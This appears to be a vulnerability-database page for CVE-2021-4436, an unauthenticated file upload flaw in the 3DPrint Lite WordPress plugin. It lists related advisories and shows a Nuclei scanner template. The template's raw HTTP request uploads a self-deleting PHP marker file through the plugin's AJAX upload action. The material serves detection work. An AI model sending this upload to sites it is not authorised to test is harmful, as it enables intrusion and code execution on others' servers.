| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2021-4436 | 5 Feb 202410:31 | โ | circl | |
| WordPress Plugin 3DPrint Lite Security Vulnerability | 5 Feb 202400:00 | โ | cnnvd | |
| CVE-2021-4436 | 5 Feb 202409:02 | โ | cve | |
| CVE-2021-4436 3DPrint Lite < 1.9.1.5 - Unauthenticated Arbitrary File Upload | 5 Feb 202409:02 | โ | cvelist | |
| CVE-2021-4436 | 5 Feb 202409:15 | โ | nvd | |
| CVE-2021-4436 | 5 Feb 202409:15 | โ | osv | |
| Design/Logic Flaw | 5 Feb 202409:15 | โ | prion | |
| PT-2024-11034 ยท WordPress ยท 3Dprint Lite | 5 Feb 202400:00 | โ | ptsecurity | |
| Hacked WordPress Sites Abusing Visitors' Browsers for Distributed Brute-Force Attacks | 7 Mar 202413:45 | โ | thn | |
| VulnCheck KEV: CVE-2021-4436 | 4 Mar 202400:00 | โ | vulncheck_kev |
id: CVE-2021-4436
info:
name: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
author: s4e-io
severity: critical
description: |
The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
impact: |
Unauthenticated attackers can upload arbitrary files including PHP scripts via the p3dlite_handle_upload AJAX action, potentially achieving remote code execution despite .htaccess protection.
remediation: Fixed in 1.9.1.5
reference:
- https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/
- https://nvd.nist.gov/vuln/detail/CVE-2021-4436
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-4436
cwe-id: CWE-434
epss-score: 0.067
epss-percentile: 0.93116
cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wp3dprinting
product: 3dprint_lite
framework: wordpress
publicwww-query: "/wp-content/plugins/3dprint-lite/"
tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive,vkev,vuln
variables:
string: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="action"
p3dlite_handle_upload
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
Content-Type: text/php
<?php echo "{{string}}";unlink(__FILE__);?>
-----------------------------54331109111293931601238262353--
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"jsonrpc":"2.0"'
- '"filename":'
- "{{filename}}.php"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100abecabe04228adacfe916576ce40fd42b5d3990674c8c4c5c66197045be4f0ce022052dcc9daeb167668c4186c7f4d4f3119847a057ca23a4edb14b7b7e5ff0d7c36:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation